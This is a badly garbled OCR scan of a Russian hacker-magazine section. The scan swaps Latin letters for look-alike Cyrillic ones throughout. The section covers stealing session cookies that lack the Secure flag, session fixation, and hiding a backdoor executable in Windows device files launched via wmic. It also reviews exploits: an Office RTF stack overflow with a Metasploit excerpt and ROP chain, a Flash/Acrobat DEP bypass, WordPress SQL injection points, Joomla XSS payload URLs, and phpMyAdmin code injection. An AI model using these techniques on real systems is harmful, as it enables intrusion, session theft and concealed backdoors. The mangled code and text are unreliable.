про онлайн-сервис для проверки сайтов. Продолжая тему, я по- тоя | . илья лен 
_ лавра ко аист и — : 
стараюсь коснуться основных проблем протокола НТТРЪ5 в этом и оеых ты ыы 
следующих выпусках. Сессиные куки, отсутствие флага 5есуге, 
Итак, давай вспомним, как происходит авторизация пользователя поле Оогат на все поддомены 
на большинстве порталов. При входе на сайт пользователь вводит 
логин и пароль в формочке, после чего отправляет запрос на платит дважды. В этом случае все что нам нужно для перехвата 
сервер. Сервер проверяет данные, и если они правильны, то при- кукисов — это подождать, пока пользователь обратится к незащи- 
сваивает данному пользователю некий случайный идентификатор — щенной части сайта. Куки передадутся в открытом виде, и мы легко 


сессии. Этот идентификатор сервер посылает пользователю, как получим кним доступ. 

поле в заголовке ответа, если точнее — в кукисах. Далее, бродя ПО 2. Активный метод. Если домен в кукисах задан точно и правильно, 
сайту и кликая по ссылкам, пользователь, кроме ОВГов отправляет тонам следует поискать какие-нибудь другие открытые порты на 

В запросах к серверу и куки с идентификатором сессии. То есть, как данном сервере. Порт подойдетлюбой. Например, очень часто 


мы видим, пароль передается только один раз. Секьюрно :]). бывает, что 80 порт на ВИр$-ном домене оставляют, на нем висит 
Ноесли мы перехватим идентификатор в куках, то, подставив их редиректна 443 порт. Такой вариант нам отлично подойдет. 

в свой браузер, свободно сможем выполнять любые команды от Требуется дождаться любого исходящего НТТР-запроса от поль- 
имени пользователя, чьи куки мы украли. зователя. После этого необходимо подменить ответ веб-сервера, 
Давай представим, что мы смогли приблизиться достаточно близко добавив Игате [например] со ссылкой на атакуемый сервер, нос 
к жертве: например, сидим сней на одной точке доступа \\/- ти нестандартным портом (80 в нашем примере]. Браузер пользова- 
провели Мап-т-ШФе-т'а@{е-атаку. Поскольку пользователь рабо- теля, увидев Нгате, подключится на этот нестандартный порти 
тает с сайтом по НТТР5, то даже если мы сможем отснифать трафик, первым же запросом передаст все свои куки в открытом виде. 

на выходе получим лишь зашифрованный дамп. Что же делать? С практической точки зрения порт может быть любым, но не очень 
Нужно посмотреть, присутствует ли флаг5есиге при установке хорошо юзать стандартные порты типа 21, 22, 25, 110, так как 
сессионного идентификатора в СооК!е. Этот флагуказывает на исходящие запросы на них в некоторых браузерах (например, в 
возможность передачи кукисов только через НТТРЪ. Если флагне Еигефох) заблокированы. 

установлен, то нам повезло, и существует пара способов для кражи Хотелось быеще раз отметить, что с данным флагом — 5есиге — 
таких кукисов. у очень многих компаний проблемы. Как поставить этот флаг? 

1. Пассивный метод. Очень часто бывает, что на сайте только один Во-первых, установить его может программист, четко указав это в 
поддомен защищен НТТРЬ, но куки устанавливаются на все под- приложении. Во-вторых, можно настроить обязательную установку 
домены, втом числе и на незащищенные НТТРЬ5. Так поступают из на уровне веб-сервера. Как пример, в Арасйе Тотса{ до 6.20 флаг 
соображений производительности, и это тот случай, когда скупой Зесиге требуется задавать вручную. 


ЗАДАЧА: ПОДМЕНИТЬ зависит от размеров атакуемой системы и используемых технологий. 
ПОЛЬЗОВАТЕЛЬСКУЮ СЕССИЮ. Алгоритм же атаки в общем виде таков: 
1) Злоумышленник входит на атакуемый сайт и авторизуется на нем. 

РЕШЕНИЕ: 2) Злоумышленник получает сессионный идентификатор. 
У описываемойтехники есть стандартное название — 5е551оп_Еха{оп 3) Злоумышленник подкидывает неавторизованному на сервере 
(Би. у/пМм/Ор}. Суть ее заключается в том, чтобы привязать атакуе- пользователю ссылку на скриптс сервера, который устанавливает куки 
мого пользователя к конкретной сессии, значение которой нам уже сидентификатором злоумышленника. 
известно. 4} Пользователь авторизуется в системе. 
Для реализации данной атаки нам требуется соблюдение двух 5) Злоумышленник входит в систему под пользователем, так какему 
условий. Во-первых, некий скрипт на атакуемом сервере, который известен сессионный идентификатор. 
позволяет в результате обработки входных данных отдавать в ответе Какмы можем видеть, у нас получается захват пользовательской 
заданный сессионный идентификатор. сессии. Что приятно для нас — реализовать это можно и по НТТР, и по 
Во-вторых, при входе пользователя в систему не должна осущест- НТТРЪ. В качестве места для экспериментов могу предложить тебе 
вляться переинициализация сессионного идентификатора пользо- проект М/ебСбоа{ от ОММА$Р"а [6 и(уеаеОЕ). Это автономный веб-сервер 
вателя. Как часто возникаюттакие случаи? Я бы сказал, что многое с группой уязвимых скриптов под различные уязвимости. 
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С:\ИТНООЧ$ \зузЕет32> 


‚СОЗДАТЬ НЕУДАЛЯЕМЫЙ 
ФАЙЛ ПОД \ММООМЕ. 


РЕШЕНИЕ: 


Конечно, неудаляемых файлов не бывает :]. Но вотзатруднить удале- 
ние файлатак, что без гугла не справиться — это можно. Зачем может 
понадобиться такая возможность? Например, для того чтобы закачан- 
ный шелл или бэкдор не удалили. 

Способ заключается втом, что нашу информацию мы будем хранить 

в специальных файлах — файлах устройств. Они появилисьеще в 
далекие времена ВОЗ`а и, по идее, использовались для прямого 
обращения кустройствам (люди, жившие вто время, но всееще 
читающие журнал «Хакер», могут меня поправить :]. Сучетом басК\/ага 


сараб (Ку — эти файлы естьеще во всех \\/п4о\м$. Если конкретнее, то 
файлы эти — СОМ, АЦХ, СОМх, МИЕ, РКМ, ЕРТх, СЕОСКХ [гдех — число 
от 1 до9). Смысл большинства из них, я думаю, ясен. Основная фича 

в том, что их не создать обычным образом, а создав — неудалить. И 
запускаются/читаются они тоже нестандартно. 

Но перейдем к делу. Чтобы создать файл, нам потребуется написать в 
консоли: 


Сору в1е. вх \\. \с: \ СОМ 
Таким образом, мы можем создавать файлы устройств и записывать в 
них информацию. Самое простое — закинуть данные сначала в еж. 
Путь до СОМ лучше указывать полный. Вывод информации осущест- 


вляется аналогично, но наоборот. 


Сору \\. \е: \ СОМ ПТе. ЕхЕ 


Но самое интересное втом, что мы можем положить в файлустройства 
ехе’шник. Например, для наглядности я положил в СОМ ста.ехе: 
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[Чензлоп 56-1-2600] 
«С> СорувтлейЕ 1985-2001 МаскозоЁЕ Сокр. 


сору с: \м1паом$ \5у$фет32\ста.ехе \\.\с:\Сом 


Самая же главная магия происходит, когда нам требуется запустить 
такой СОМ-ст@.ехе: 


мт1с ргосе$$ са11 сгеа*фе \\.\с: \СОМ 
Что приятно, данная фича работает и в \Ипао\м/5 ХРив 7. Аесли 


мы закинем файл в какую-нибудь системную папку, то спрятанный 
бекдорчик совсем не будет вызывать подозрений. Жаль только, 


что для антвирусов данные файлы совсем не проблема. 32 


› 043 


ЕХРЕОП$ 
ВЕМЕМ 


м му Гут! Че. (одзро{. сот) 
р!КоЁагад (115612, дер. Красная звездочка, д.1) 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОТ5 
ВЕМЕМ 


ЕХРЕОП$ 


КЕМИЕМ ЕХР ОТ 


ВЕМЕМУ 


ОБ50Р 


ЕХРЕОП$ 
ВЕМЕ\У 


ЕХРЕОП$ 
ВЕМЕ\У 


ЕХРЕОП$ 
ВЕМЕМИ 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 


ВЕМЛЕМУ 


ЭКСПЛОИТОВ 


Приветствуем тебя, о достопочтимый читатель! Пишем тебе 

из деревни Красная звездочка, что во Владимирской области 
зиждется. Погода у нас отличная, да и вообще хорошо 
отдыхается. Давеча праздник какой-то отмечали — вино лилось 
рекой, и мужики местные, захмелев, проговорились, что ходит 
по интернетам молва об эксплоитах новых и интересных, да 
все подробности о них тут же и выложили. Мы послушали- 
послушали, да и решили рассказ сей тщательнейшим образом 
законспектировать и к письму этому приложить. 


0 МУ ОЙсе 2010 КТЕ Неааег ЗТаск 
Оуеом/и Уипега Пу Ехрой 
С\$$ \У2 ВАЗЕ $СОКЕ: 9.3 (НСН) 


[©\$5 М2 ВАЗЕЗСОВЕ: о ознен 
УЗНИК 

[АУМ/АС:М/Ач:М/С:СЛ:С/А:С] 
[ВРИЕР 


Дата релиза: 3 июля 2011 года 

Автор: 5пакКе 

С\Е: СУЕ-2010-3333 

Переполнение буфера на стеке в Мсгозой О се ХР $Р3З, Овсе 2003 5Р3, 
Осе 2007 $Р2, ОНсе 2010, ОНсе 2004 апд 2008 Тог Мас, О! Исе Гог Мас 
2011 ап9 Ореп ХМЕ Ее Еогта{ СопуецегТог Мас позволяет злоумыш- 
леннику исполнить произвольный код, используя специальным образом 
сформированные КТЕ-данные. 

Данный эксплоит примечателен не собственно реализацией уязви- 
мости [о ней было известно еще в октябре прошлого года], а использо- 
ванием техники, названной «!Кагисв! ОЕР/АЗЕВЕ Вураз$», для обхода 
защитных механизмов ОЕР/А$ЕВ. 


Выдержка из спецификации ВТЕ (ЕсВ Тех Еоггпа? для Мсгозо ОЁ#се 
\/ога 2003: 


? 044 


«Изображение свойств объектов. 

Основная масса изображаемых объектов определяется серией свойств. 
Управляющиетэги располагаются следующим образом: первым идет 
тэг«{\$Вр», за ним следует «{\*\5рт$. Далее идущиетэги описывают 
все свойства фигуры. Каждое из свойств имеет следующий формат: 


{\$р{\зп РгорегЕУуМамте }{\5у Ргорегфу\/а1иеТпфогта*1оп} } 


Каждое свойство фигуры, определенноетэгом «\5р» представляет собой 
пару: имя («\5п»] и соответствующее этому имени значение («\5\»].> 
ВРОС ВТЕ-файле затэгом «\5п», задающего имя «рЁЕгадтег{» для 
свойства, следуеттэг«\\», задачей которого является описание значе- 
ний для заданного ранее свойства «рЕгадгтеп(». Данный тэг содержит 
значения, разделенныеточкой с запятой, третье из которых имеет 
неблаговидный лик, нуи, соответственно, обрабатывается при разборе 
КТЕ-файла вордом неверно. В общем виде структура эксплоита должна 
выглядеть следующим образом: 


{\гЕ+1{\5Ир{\*\$Ир1п${{\$р{\5п рЕгавтептт$ }{\$\ А; В; [мога1 ] 
[мога2 ] [мога3 ] [Пех_уа1ие_аггау]}}}}} 


А — целочисленное значение, которое не может быть равно 2,4 илиё8; 
В — целочисленное значение; 


м/ога1 — 2-байтовое значение [51хео \М/ОКО]}, которое не может быть нулем; 
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ВЕМЕМ 


Т5 


ЕХРЕОП$ 


ЕХРЕОТ$ 
ВЕМЕ\У 


ЕХРЕОП$ 
КЕМЛЕ 


ЕХРЕОП 
деСопт19Е1 1е(} 


руб лс 5Татлс 


= СопТ10Е1 12: :де1тТпетапсе [): 


ый М М Гы ГЫ №1 + 


са 


К. № РЯ 5 Л РЯ РЫ в] р 
м 


РТ 
521 | 


Ссепегатей соптТтдигаттой Це", 
бепегатед Бу: рирмМуддтлп ' 


Пл Ва Кы пы в 


= Кай ТЫ ыы 


‚ |" зеГир 5сгар" , %6сгИ 


вый ны 
Е кл 


г’, СГУ, $”: 


аи Сы 
ный 


Гы 5, 


// зегуегъ 
11 ([$СГ->дет$егуегсоипт() > 9) { 
$гег = "/* бегуегь сопТтоугаттой */ 
Гогеасй ($с['Зегуег$"] ах $10 
эгег .= '/* зегмег;: °. 51 
‚ бч:! , ОРТ: 
Гогеасн ($3егуег а$ $К => 
$К = ргед гер\асе('/[” 
$гег .= "\$СТ9[ 'бегуего 
‚ 115 аггау[5у} ыы 


кА ы 
— а \ 


ым 
< 


А вл вл 
И Гы Шы 


КА БА 
Е 


Функция, генерирующая конфиг рирМуАагт 


м/ога? — 2-байтовое значение, которое не может быть больше чем м/ога1; 
м/ога3 — 2-байтовое значение, которое будет использоваться как размер 


для переполнения буфера на стеке; 

м/ога1 *\/ога? — должны быть равны размеру выделяемой памяти под 
массив Пех_уа{це_аггау, соответственно значение это должно быть в 
меру адекватно; 

Пех_муаше_аггау — строка, содержащая значения, которыми будет 
перезаписываться буфер, располагающийся на стеке, в процессе его 
переполнения. 

При начертании м/ога1 ‚ млога2 и мога3 необходимо использовать обрат- 
ный порядок записи: первым идет младший байт, затем старший. 
Краткий отрывок из модуля для пыазр[ок, генерирующего г -файл, 
который будет эксплуатировать данную уязвимость: 


$р1о1+ = "%а;%а;" % [е1_$17е, е1_ соип*] 
$р1о1{ << дафа.ипраск('Н*').Яг$* 
$р101* << гез&.ипрасКк("'Н*').Яг$* 


сопфепе = "{\\гЕЕ1" 
сопфеп* << "{\\$Пр" 
сопфеп* << "{\\$р" 


# фигура 

# свойство фигуры 
сопфеп* << "{\\5п рЕгартепт5 }"# имя свойства 
сопфепе << "{\\$\ #{зр101*}}" # значение свойства 
СоПепЕ <<}. 

сопфепе << "}" 

сопфепе << "}" 


рг1п*_5Факи$ ("Сгеа{1п? '#{4афаз®оге['ЕТЕЕМАМЕ' ] }'Я1е...”) 
#]е_сгеате ( сопфеп*) 
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ВЕРЕ = (3 :Е55ТОЧ[ "201 ']) && $ ЗЕЗЗТОН[ '201'] == 'мш’) ? "мп" 


‚ УООвА5["РМА Соп!19' ] ->9е1('РМА УЕАЗТОМ') 


бате; ' . Чате(оАТЕ АРС1123) . $сгЦ 


1[1$1]['$К*] 

5е1Т:: 1сгеговасодАггау ($) 
? з&Т:: ехрогтгеговазедАггау($и, $сг1Т) 
" маг ехрогс($у, 


Ге) 2 


'/® ЕП ОТ &егуеге сопттдигатзоп *®; 


Перезапись буфера на стеке происходит в следующем месте библиотеки 
пП50.АЦ: 


39200661 $Погф 150. 39200682 

39200663 есх ‚ амога рг $$: [еб р+8 ] 

39200666 еах , амога рег 4$: [есх+с] 

39200669 еах , ОЕЕЕ+ 

3920066е еах п 
3920 066+ еах , Чмога рЕг $$: [ебр+19] 

39200673 еах , Чмога рег 4$: [есх+10] 

39200676 еах р де 
39200677 амога рег $$: [ебр+с] ; аез*& 
3920067а < .&тз\усг90.тетсру> ; тетсру - оуегЯом! 
3920067+ езр,9с 

392005682 ебр 

39200583 9с 


В конце концов мы попадаем на первый адрес в КОР-цепочке, исполня- 
емее и видим калькулятор. 
Атеперь немного подробнее про КОР-цепочку 
9хзЕ2СВЭЕ@ ЕСХ 
# НеарСгеа*е() ТАТ = 3Е10115С 
9хзЕ389САЪ 


ЕАХ , ОМОВО РТК 05: [ЕСХ] 


# ЕАХ == адрес НеарСгеате() 
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РИО ЕХРЕОП$ 
КЕМЕМИГ пе ВЕМЕ\У 

ЕХРЕОП$ 
ВЕМЕМ/ 


=. реет ОЕ РГ РАМОН, ЕЖЕ [РИ ты п Темы, оды тв 
г. 


ры и 
У ПП мы ь ПЧ - Тешееьсерьк тт | 


ТЕТЕ РЕТРО 


ПЕ ети. 


@хЗЕЗЭАЕСЕ САЕЕ ЕАХ 
ВЕТМ 
# Вызываем НеарСгеа*е() и создаем 
# исполняемую кучу после этого вызова ЕАХ 
# содержит адрес созданной нами кучи 


@хзЕ2СВЭЕО РОР ЕСХ # сейчас ЕСХ указывает на ближайшее смещение 
ВЕТМ # стека 
# рор 0х00008000 в ЕСХ 
ОХЗЕЗЭУЗЬЕ РОР ЕБХ 
@х3зЕ39СВ46 АОО ЕАХ , ЕСХ ВЕТМ 
РОР ЕЗТ # рор 90х00000024 в ЕБХ 
ВЕТМ 
# прибавляем ЕСХ к ЕАХ вместо того, чтобы вызывать 9х3зЕ39СВ44. АБО ЕСХ ‚ ЕБХ 
# НеарА11ос, теперь ЕАХ указывает на ВмХ-кучу АБО ЕАХ ‚ ЕСХ 
РОР ЕТ 
@хзЕ2СВЭЕ@ РОР ЕСХ ВЕТМ 
ВЕТМ # прибавим 90х24 к ЕСХ (адрес стека) 
# рор 9хзЕЗВЗЬС@ в ЕСХ, по этому адресу 
# можно что-нибудь записать 0х3Е398267 МО\ ЕАХ , ЕСХ 
ВЕТМ 
ЭХЗЕ2233СЕ МО\ ОМОВО РТК 05: [ЕСХ] ‚ ЕАХ 
ВЕТМ 9х3Е3А160Е МО\/ ОМОКО РТК 05: [ЕСХ] ‚ ЕАХ 
# сохраняем адрес нашей ВИХ-кучи по адресу ХОК ЕАХ, ЕАХ 
# 9хзЕЗВ30С0 (ЕСХ) для дальнейшего использования РОР Е$Т 
ВЕТМ 
@хзЕ20590Е РОР ЕАХ # скопируем значение ЕАХ (5$%аск Адаге$$+24 = 
АБО ОМОВО РТК 05$: [ЕАХ] , ЕЗР # текущее значение ЕЗР ) по текущему адресу стека 
ВЕТМ # и снимем со стека значение в ЕФТ. Теперь ЕЗТ 
# рор 9х3Е3В30С4 в ЕАХ, по этому адресу # указывает на начало шеллкода, располагающегося на стеке 
# содержится 9 и туда можно что-нибудь записать 
# Что мы и сделаем, прибавив к 9 значение 0х3Е398267 МО\ ЕАХ, ЕСХ 
# регистра Е$Р, адрес ЕЗР нам нужен, КЕТМ 
# скопировать шеллкод (который располагается на стеке) 
@хзЕ2СВЭЕ@ РОР ЕСХ 
@х3зЕ2Е18СС РОР ЕАХ ВЕТМ 
ВЕТМ # рор 9хЗЕЗВЗОС@ (сохраненный адрес кучи) в ЕСХ 
# рор 9х3ЕЗВЗОС4 ( Е$Р адаге$$ ) в ЕАХ 
@х3ЗЕ389СА5 МО\ ЕАХ ‚, ОМОВО РТВ 05: [ЕСХ] 
@х3Е2В745Е МО\/ ЕСХ ‚ ОМОКО РТК 05: [ЕАХ] ВЕТМ 
ВЕТМ # сейчас ЕАХ указывает на нашу КИХ-кучу 
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ЕХРЕОТ$ 
ВЕМЕ\У 


Вызов глетсру, творящий беззаконие на стеке 


9хзЕ2В0А7С ХСНе ЕАХ, ЕОТ 
ВЕТМ 4 

# ЕОТ = адрес нашей КИХ-кучи 
9х3зЕ2СВЭЕВ РОР ЕСХ 
ВЕТМ 


# рор 9хЗЕЗВЗОС@ (сохраненный адрес кучи) в ЕСХ 


9х3Е389СА5 МО\/ ЕАХ ‚ ОМОКО РТК 05: [ЕСХ] 
ВЕТМ 
# ЕАХ указывает на нашу КИХ-кучу 
@хЗЕЗ8ВЕЕВ АОО АЕ, 58 
ВЕТМ 
# какой-то бред :) 
9хЗЕ2СВЭЕЙ РОР ЕСХ 
ВЕТМ 
# рор 90х00000089 в ЕСХ 
# (90х80 * 4 = 090х200 = размер копируемой области) 
0х3Е3441В4 ВЕР МО\/5 ОМОКО РТК ЕЗ : [ЕБТ] ,‚ ОМОВО РТК 05: [ЕЗТ] 
РОР ЕОТ 
РОР ЕЗТ 
ВЕТМ 
# Копируем шеллкод со стека в КИХ-кучу 
@хЗЕЗЭАЕСЕ САЕЕ ЕАХ 
ВЕТМ 
# Исполняем шеллкод 


Мсгозо ОНсехР $Р3З, ОНсе 2003 $Р3, ОНсе 2007 5Р2, О се 2010, 
О се 2004 и 2008 для Мас, ОТИсе для Мас 2011 иОреп ХМЕ Ее Гогта{ 
Сопуещег для Мас. 


Установить обновления. 


02 


С\5$ \2 ВАЗЕ $СОКЕ: 9.3 (НСН) 


рролодоСОО ООО ООО ЗОВ ОВО ВОС 
[(АУМ/АС:М/Аи:М/С:СЛ: СГА: С] [едепа] 
|ВРЕР 


Дата релиза: 3 июля 2011 года 


даоре Кеадег Х Ают Туре СопТи$юп 
\Уипега Му Ехр]ой 
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Бажная функция РМА_сгеаеТагде а е$ 


Автор: 5паКе 

С\Е: СУЕ-2011-0611 

Еще одно ухищрение, направленное на обход ОЕР/АЗЕВ и использую- 
щее в качестве базы уязвимость С\УЕ-2011-0611, опубликованную 4 мая 
2011 года. 


Этот метод обхода механизмов защиты ОЕР/АЗ В был назван Та{витак!. 
Применяется он для АдоБе-Х [но не для запаБох}. Для того чтобы было 
хорошо, необходимо подгрузить библиотеку сгур{осте?.аЦ. 

Кодес для загрузки сгуросте2.аЦ: 


<</Туре/Сафа1о5/Радбе$ 3 0 К/ОрепАстТоп 5 0 В/АсгоРогт 7 9 К >> 
Апа тПеп 


8 0 об] 
<</ЁЕепдёЕИ 372>> 


$Егеат 

<?хт1 уег$10оп="1.0" епсод1п="УТЕ-8"?> 

<хар:хар хт1п$ : хар=" Вр: //п$.ааоБе. сот/хар/" > 
<сопй5 хт1п5=" Ир: / /ммм. хРа.ог5/зсПВета/хс1/2.6/"> 
<ргезеп><ра+><1пегас{1\уе>1</1п{егасЕ1уе></раф>< /ргезепт*> 
</сопй5> 

<Фетр1афе хт1п5=" Пр: //ммм.х+а.ог&/зспета/х+а- 
фетр]1афе/2.6/"> 

<зибФогт пате="Фогт1" Тауоц*="{Ь" 1оса1е="еп_Ц15"> 
<разе5$е*>< /равезет> 

</зибФогт>< /Фетр1афе></хар:хар> 

епа5{геат 

епаоБ`) 


хге+ 


Теперь мы можем пользоваться любезно предоставленной библиотекой, 
скомпилированной без поддержки АЗЕК, для своих исследовательских 
целей :]. 


Адобе ЕНазП Р(ауег до версии 10.2.154.27 на ОС \МИпдоми, Мас О$Х, пих, 
и 5о([ап$, и 10.2.156.12 и более ранние версии на Апаго!а 

АдоБедК до 2.6.19140; 

Ащр(ау.а Ц [Так называемый АщЬР!(ау Ь.Бипа] вАдоБе Веадег9.х до 
9.4.4 и 10.х вплоть до 10.0.1 на \\ММп9о\м/<; 

Адоре Кеадег9.хдо9.4.4 и 10.х до 10.0.Зна Мас О5Х; 

также АдоБе Асгорат9.х до 9.4.4 и 10.х до 10.0.3 на МИп9ом/5 иМас05Х 
позволяютудаленным атакующим исполнять произвольный код или 
вызывать отказ в обслуживании сервиса (падение приложения] через 
специальным образом сформированные Еазй-данные. 


ОЦЛОМ 
Обновить Адобе НазВ Р!ауег. 
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вии ве ва пи ла тн ыныиииыы п м м 1 Ш Ш о ГЕРГИЕВ 
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зо шт ыеым иное мар а в м И БЕРГ По 
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ныть вы Пр в 11 а Пи шипы нити а м т етот 
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РТВ: БЕ ТЕ 1 1 5 БЕ 9 21 ва м м мые им м 9 2 В м т ЕР ВИГЕН © 
т И В м О Тм м Отт м т | 
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п 
ВЕ 
ЕЕ 
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О 
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УЕ ВЕ 11. 14 Е 
ИГ 


11 № 
91 м4 


| 
ВЕ вр а 
У Е 14 
Ян вЫ Ша 


азы 


Г ыы ПЕ ва 19 ай = 


т в 1 
ВИ ВЕ 1 
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НЫ вы 1 


п т мм 
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Содержимое КТЕ-документа, приводящее к падению 


0 33 $(-инъекции в \\/огаРге$$ 3.1.3 


С\5$5\2 6.0 


СУББУ 2 иАКИИИЕЕ ИАА ТЕАЕЛЕТИтИ РЕБЕ ИЕН МАЕ О 0 
ЗУД ЛИВИИ ИИ 

([АУМ/АС:М/Ач :О/С:РА :Р/А:Р] 
[ВЕЧЕР 


Что такое \\МогаРге$$ должен знать каждый школьникначальных клас- 
сов, поэтому не буду долго по этому поводу распространяться, а сразу 
перейду ближе ктелу. На этот разуязвимость обнаружена не в каком- 
нибудь плагине, а в самом движке, поэтому ей подвержены абсолютно 
все ресурсы на этом движке, хотя и не абсолютно всех версий. 

Да и сэксплуатацией здесь не всетак просто: чтобы выполнить 5( - 
инъекцию, потребуется пользователь с правами Еа9Ког, не меньше! Ну 
и если все сложится хорошо, то ты сможешь поиметь доступ к БД сайта 
с правами пользователя \\огаРгез$, а, стало быть, и слить реквизить 
всех пользователей итак далее. 


Уязвимость существует из-за неподобающей фильтрации переменных, 
короче, как обычно. 

Функция де! {еггп$(], определенная в\м/р-псидезДахопогпу.оВр, недо- 
статочно хорошо проверяет данные, переданные клиентом, в результате 
чего пользователь с привилегиями ЕЧКог может внедрить произ- 
вольные $1 -команды в параметрах огаегбу и огаег Следующие УКЕ 
показываютточки внедрения 59! -команд [помечены обозначением 
[ШЛЯПА]: 


» Пр: //1оса1Но${ /мр-а@т1п/еа1{-+а$.рИр? 
Тахопоту=11пК_са%фегогу&огаегБу= [ШЛЯПА ] &огдег= [ ШЛЯПА] 
» ПЕр: //1оса1Но${/мр-а@т1п/е1{-+а$.рИр? 
Тахопоту=ро$*_Тав8огаегБу= [ ШЛЯПА ] &огаег= [ ШЛЯПА] 

» Пр: //]1оса1Но${/мр-а@т1п/е1{-+а$.рИр? 
Тахопоту=са*евогу&огаегБу= [ ШЛЯПА ] &огаег= [ ШЛЯПА] 


Аналогичная ситуация наблюдается с функцией де! _БооКтагкз(} 
которая находится в файле мр-шс{идез/Боокплагк.рНр, УРЕ для 
последующей эксплуатации выглядит похожим образом: Ир: / / 
]оса1Но${ /мр-а@т1п/11пК-тапазег .рИр?огаегБу= [ ШЛЯПА] & 
огаег=[ ШЛЯПА]. 

Чуть не забыл, что инъекциитут слепые, поэтому вручную тутловить 
нечего, а надо бы воспользоваться благами цивилизации, то есть сред- 
ствами автоматизации. К примеру, запросто сгодится всеми известный 
5а!тар, входящий в состав ВаскКТгаск. 


\\МогаРгез< 3.1.3/3.2-РС1 и, возможно, более ранние версии. 
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ОШЛЮМ 

Нужно обновиться до версии 3.1.4 или 3.2-КСЗ. Если такой возможности 
нет, то можно временно понизить всех пользователей-редакторов до 
ранга АЩПог. 


Множественные 
Х$5-уязвимости в/оогта! 1.6.3 


УЗЛЫ ИИИИ и М ИИ Мими вии 
(АМ: М/АС:М/Ач:М/С:РЛ :Р/А:Р] 
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В конце июня сего года этническими хакерами из группировки УСМ 
было опубликовано полное раскрытие уязвимостей в базовых компо- 
нентах /оогп[а, а именно: согп_сог{ас{, сот_согщег\, сот_пемиеей$ и 
согп_сеагсй. Уязвимости позволяют атакующему внедрить в содержи- 
мое страницы произвольные скрипты, тем самым завладев данными 
сессии беспечного пользователя, перешедшего по специально сфор- 
мированной ЦКИ. 


Некоторые параметры в базовых компонентах }оогп(а! не отличились 
выдающимися результатами по фильтрации спецсимволов, среди них 
Очегу па, орНоп и зеагс\мога. РоС для компонента согп_сог{ас( и 
параметра Чиегу5 та выглядиттак: 


ПЕЁр: //аЕфаскКег.1п/]оот1а163_позео/1паех .рИр?ор1оп=сот_с 
опфас*&\1ем=сафегогу&са*149=268&149=36&Т{ет1а=- 
1"; ><5сг1рЕ>а1егЕ(/Х$$/)</зсг1рЕ> 


Для других компонентов ситуация не сильно отличается: 


» Пр: //аЕФаскег.1п/)оот1а163_позео/1паех.рИр?ор{1оп=сом_с 
оптеп{&\1ем=сафеёогу&19=19&Т%ет149=260&11т11=10&1А1%ег_огаег_ 
01г=&1111% 5 агЕ=&А1{ег_ огаег=><5сг1рЕ>а1егЕ(/Х$5/)</зсг1рЕ> 
ЮЕЕр: //аЕаскКег.1п/]00т1а163_по5ео/1паех .рИр?ор1оп=сот_п 
ем5Рее4$&\и1ем=сафевогу&19=17&мПафеуегевеге=" ; ><$сг1рф> 
а1ег{(/Х$$5/)</зсг1рЕ>&1ет19=253&1111*=10&А1{ег_огаег_ 
01^=А$С&А1Фег_огдег=огадег1 п? 


» ИЕТр: //аЕТаскег.1п/)]оот1а163_позео/1паех. 
рир?орЕ1оп=" ; ><5сг1рЕ>а1ег*(/Х$$/)</зсг1рЕ>&ЕазК=гезет. 
гедче$ 


А вот для эксплуатации уязвимости в компоненте сот_<еагсй и параме- 
тре зеагсВ\/ога придется изменить РО$Т-запрослюбыми подручными 
средствами (Муе НТТР Неафдегс, Таппрег Оака, е{с). В результате запрос 
должен принять примернотакой вид: 


РОЗТ /]00м1а163/1паех.рИр НТТР/1.1 

Вефегег: Пр: //а*ФасКег.1п/)оот1а163/ 
У5ег-Ареп*: Копачегог/4.5 

Саспе-Соп*го1: по-сасВе 

Сопфеп{-Туре: арр11са1оп/х-имм-Фогт-иг1епсоаеа 
Но${: аЕфаскег.1п 

Ассерт-ЕпсоЧ1п5: 571р, аеНа{е 

Сопфепе-ЕепёеП: 125 


ор{1оп=сот_зеагсИ&5еагсИмога= '%2522%2530%252Е5сг1р*%253Е%2 
53С5сг1р{%253Еа1ег{ (%252ЕХ5$5$%252Е)%253(С%252Е$сг1р{%25ЗЕ& {а 
$К=5еагсп 


Зоогпа! 1.6.3 и более ранние 
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ЗОШЛЮМ 
Надо обновиться до ]оогп(а! 1.6.4 или более поздней. 
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Множественные уязвимости 
в рАрМуАадти 3.х 


С\55\2 7.5 


(АУ: МАС: Аи: М/С:РЛ:Р/А:Р)] 
ВЕЕР 
В июле месяце неким исследователем под ником Мапдо был обнару- 
жен рядуязвимостей в рЮрМуАдпиит — популярном веб-приложении, 
предназначенном для администрирования СУБД МуФОЕ. Среди них 
множество 5 [-инъекций и Х$5 разной степени сложности, произ- 
вольные выполнения кода и выход за пределы корневой директории 
веб-сервера. Разберемся сними по порядку. 


В файле Ибгапез/ац{В/змекеу/з\меКеу.ащй.ИБ.рПр рассмотрим кусок 
кодана 266-2'/6 строках: 


1+ (5%г5%г($_ЗЕВ\МЕВ[ 'ОЧЕВУ_5ТВТМб' ], '5е5$$1оп_фо_ипзе*') 
|= Ра15е) 


рагзе_з+г($_ЗЕВ\ЕВ [ 'ОЧЕВУ _$ТВТ№ ' ]); 
5е5$$10п_мг1{е_с10$е(); 
5е5$10п_14($5е$$1оп_%о_ип$е*); 
5е5$$10п_5%аг*(); 

$ ЕТОМ = аггау(); 
5е5$$10п_мг1{е_с10$е(); 
5е5$10п_4е5%гоу(); 

ех1*; 


Замес здесь состоит в том, что функция рагзе_${г принимаетлишь 
один параметр, что позволяет нам получить доступ ко всем пере- 
менным в текущем пространстве имен, в том числе к массиву $ _ 
ЪЕЗЗ1О М. Это открывает возможности для эксплуатации ряда 5Ы1 - 
инъекций и Х55, но не будем останавливаться на них, а перейдем к 
более серьезным багам. 

На рисунке приведен кусок кода, который генерирует конфигураци- 
онный файл, обрати внимание на строчку 42, где создается некий 
комментарий с дополнительной информацией в конфиге. Легко 
видеть, что вызов $с+- >де{бегуегМате($1а] фильтруется на закры- 
тие, собственно говоря, коммента. Зато переменная $14, входящая в 
массив $с['бегуегс'], никак не фильтруется. Таким образом, появля- 
ется возможность вставить символы закрытия коммента */, а заодно 
и выполнить произвольный РНР-код. Генерируется же массив $с 
вызовом функции $с{- >деСопЯ9(} на строке 26. А вот, собственно, и 
код этой функции: 


рчб11с КипсЕ1оп ве*Сопйв () 


й 
$с = $ $Е55ТОМ[ $411$->14]; 
фогеасй ($461$->с+вУрдафекеаЧМарр1т# аз $тар_+№о => 


фтар_4гот) 
{ 
РМА_аггау_мг1{е ($тар_Фо, $с, РМА_аггау_геаа( 
фтар_ гот, $с)); 
РМА_аггау_гетоуе ($тар_гот, $с); 
} 
